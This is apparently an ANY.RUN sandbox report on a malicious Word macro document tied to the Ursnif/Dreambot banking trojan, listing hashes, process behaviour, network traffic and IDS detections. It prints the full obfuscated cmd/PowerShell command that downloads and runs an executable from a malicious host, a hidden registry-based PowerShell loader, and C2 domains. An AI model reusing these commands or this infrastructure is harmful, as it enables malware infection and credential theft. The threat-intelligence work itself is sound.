analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Service_1st.doc

Full analysis: https://app.any.run/tasks/b61a8ba6-93bd-4430-975b-663b1d976504
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 21:33:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-close
gozi
ursnif
opendir
loader
trojan
dreambot
evasion
stealer
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Profit-focused leading edge frame, Subject: Maryland Lucas, Author: 1-440-621-7078 x377, Comments: Face to face optimizing hub, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Nov 14 08:13:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

38E9FF652827CF6AFB33F688EE2D621E

SHA1:

5703B51EE832539CD0169DF680001F47C9E184A3

SHA256:

0EB381D8F60F8A98129111EC108157A83239A3AAF4872CCF2AC862839800400F

SSDEEP:

1536:F9uI8jJbfeXbwyvscutAxc8rluCE9/yW5eDt3m6AZcndS/sllpjZe52SE6:fsJ6Xdkc1RrE5SAZ/UZEE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3552)
    • URSNIF was detected

      • powershell.exe (PID: 3824)
      • iexplore.exe (PID: 2740)
      • iexplore.exe (PID: 3148)
    • Executes PowerShell scripts

      • cMd.EXE (PID: 3124)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3552)
    • Application was dropped or rewritten from another process

      • 739055c.exe (PID: 2992)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3824)
    • Connects to CnC server

      • iexplore.exe (PID: 3148)
      • iexplore.exe (PID: 2740)
    • DREAMBOT was detected

      • iexplore.exe (PID: 2740)
    • Application was injected by another process

      • explorer.exe (PID: 1728)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 4088)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 1728)
    • Stealing of credential data

      • explorer.exe (PID: 1728)
    • Runs injected code in another process

      • powershell.exe (PID: 1440)
  • SUSPICIOUS

    • Creates files in the user directory

      • explorer.exe (PID: 1728)
      • powershell.exe (PID: 3824)
      • powershell.exe (PID: 1440)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 1728)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3824)
    • Uses WMIC.EXE to create a new process

      • explorer.exe (PID: 1728)
    • Checks for external IP

      • nslookup.exe (PID: 2540)
    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 1728)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3552)
      • iexplore.exe (PID: 2740)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 1728)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3552)
    • Changes internet zones settings

      • iexplore.exe (PID: 2080)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2740)
      • iexplore.exe (PID: 3148)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2740)
      • iexplore.exe (PID: 3148)
    • Application launched itself

      • iexplore.exe (PID: 2080)
    • Reads settings of System Certificates

      • explorer.exe (PID: 1728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Profit-focused leading edge frame
Subject: Maryland Lucas
Author: 1-440-621-7078 x377
Keywords: -
Comments: Face to face optimizing hub
Template: Normal
LastModifiedBy: Пользователь Windows
RevisionNumber: 10
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:04:19 18:59:00
ModifyDate: 2018:11:14 08:13:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Manager: Alexandra Shanahan II
Company: Bins Group Roosevelt Crist
Bytes: 103936
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
20
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start inject winword.exe no specs cmd.exe no specs #URSNIF powershell.exe 739055c.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe wmic.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs ping.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs makecab.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3552"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Service_1st.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3124cMd.EXE /c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^v^A^H^k^A^b^w^B^r^A^H^U^A^b^g^B^v^A^H^M^A^a^A^B^p^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^G^k^A^c^g^B^p^A^G^c^A^M^Q^A^x^A^C^4^A^d^w^B^v^A^H^M^A^I^g^A^s^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^I^A^A^r^A^C^A^A^J^w^B^c^A^D^c^A^M^w^A^5^A^D^A^A^N^Q^A^1^A^G^M^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^M^w^A^5^A^D^A^A^N^Q^A^1^A^G^M^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^D^s^A^I^A^B^F^A^H^g^A^a^Q^B^0^A^A^=^=C:\Windows\system32\cMd.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3824poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBvAHkAbwBrAHUAbgBvAHMAaABpAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AGkAcgBpAGcAMQAxAC4AdwBvAHMAIgAsACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAIAArACAAJwBcADcAMwA5ADAANQA1AGMALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAMwA5ADAANQA1AGMALgBlAHgAZQAnADsAIABFAHgAaQB0AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2992"C:\Users\admin\AppData\Roaming\739055c.exe" C:\Users\admin\AppData\Roaming\739055c.exepowershell.exe
User:
admin
Company:
SportsSignup Radio
Integrity Level:
MEDIUM
Description:
Togetherpound
Exit code:
0
2080"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2740"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2080 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3148"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2080 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3304"C:\Windows\system32\wbem\wmic.exe" /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))"C:\Windows\system32\wbem\wmic.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1440powershell -w hidden iex([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB').crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2108"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ajq2z0fh.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
Total events
5 552
Read events
5 245
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
12
Text files
15
Unknown types
9

Dropped files

PID
Process
Filename
Type
3552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AFF.tmp.cvr
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0969FA76EC415885.TMP
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B18D726-90B1-4219-978A-C19C2C3622A8}.tmp
MD5:
SHA256:
3552WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{7590E0FD-8884-499C-8B90-32DD4122EAF9}.tmp
MD5:
SHA256:
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9DOGFHF50MWWA0AZVIAM.temp
MD5:
SHA256:
2080iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2080iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2080iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\favicon[1].ico
MD5:
SHA256:
2080iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFF55A57DAEEFCCDCE.TMP
MD5:
SHA256:
2080iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFE928EB17BCA204E5.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
12
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2740
iexplore.exe
GET
46.17.46.173:80
http://cjwefomatt.com/images/skzPyX1GdSAvVlOy/91YMsUguREortss/5YS4QCW_2FJCR3GB1X/jH3LjfeBz/uLOod7OvkYnm5ulaWtgu/IT3eqJ1ndLmFV73o_2F/pjNEXEBPHjHtgC3gSR1VOa/DEab31a_2FDE8/vB6zSklT/h6uhXIjB72PyEGjVbZTGeFm/URgov2OqRvB1/oD.avi
RU
malicious
3824
powershell.exe
GET
200
46.17.46.97:80
http://oyokunoshi.com/YER/pelim.php?l=irig11.wos
RU
executable
488 Kb
malicious
3148
iexplore.exe
GET
200
46.17.46.173:80
http://cjwefomatt.com/images/hmvtgvABQIiDM/fpxqrxL7/O2kgMUzwZX_2BqkQc76CbGU/Yzn6h8QAvC/jBkuNxDO5BovFwU7c/8ZO5MbIvFCp1/gTQDqYhURXt/MVoYT54khJRjoV/ds4Tq9cMGHGdoVq6Mqi64/92MPJPi3n_2FiSPp/grdamFXlvomMN_2/Bxb40x_2FmIrN4f/vvRv.avi
RU
text
1.74 Kb
malicious
2080
iexplore.exe
GET
200
13.107.21.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2080
iexplore.exe
GET
200
13.107.21.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2080
iexplore.exe
GET
200
46.17.46.173:80
http://cjwefomatt.com/favicon.ico
RU
image
5.30 Kb
malicious
1728
explorer.exe
GET
200
13.107.4.50:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
54.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2080
iexplore.exe
13.107.21.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2540
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
3824
powershell.exe
46.17.46.97:80
oyokunoshi.com
LLC Baxet
RU
suspicious
3148
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
2080
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
2740
iexplore.exe
46.17.46.173:80
cjwefomatt.com
LLC Baxet
RU
malicious
1728
explorer.exe
95.181.198.231:443
wifilhefonle.com
Dataline Ltd
RU
malicious
1728
explorer.exe
13.107.4.50:80
www.download.windowsupdate.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
oyokunoshi.com
  • 46.17.46.97
malicious
www.bing.com
  • 13.107.21.200
  • 204.79.197.200
whitelisted
cjwefomatt.com
  • 46.17.46.173
malicious
resolver1.opendns.com
  • 208.67.222.222
shared
myip.opendns.com
  • 185.144.100.131
shared
wifilhefonle.com
  • 95.181.198.231
malicious
www.download.windowsupdate.com
  • 13.107.4.50
whitelisted

Threats

PID
Process
Class
Message
3824
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3824
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3824
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2740
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
3148
iexplore.exe
A Network Trojan was detected
SC SPYWARE TrojanSpy:Win32/Ursnif variant
3148
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2540
nslookup.exe
unknown
SURICATA DNS malformed request data
2540
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2540
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
1728
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:Win32/Ursnif malicious SSL Certificate Detected
7 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144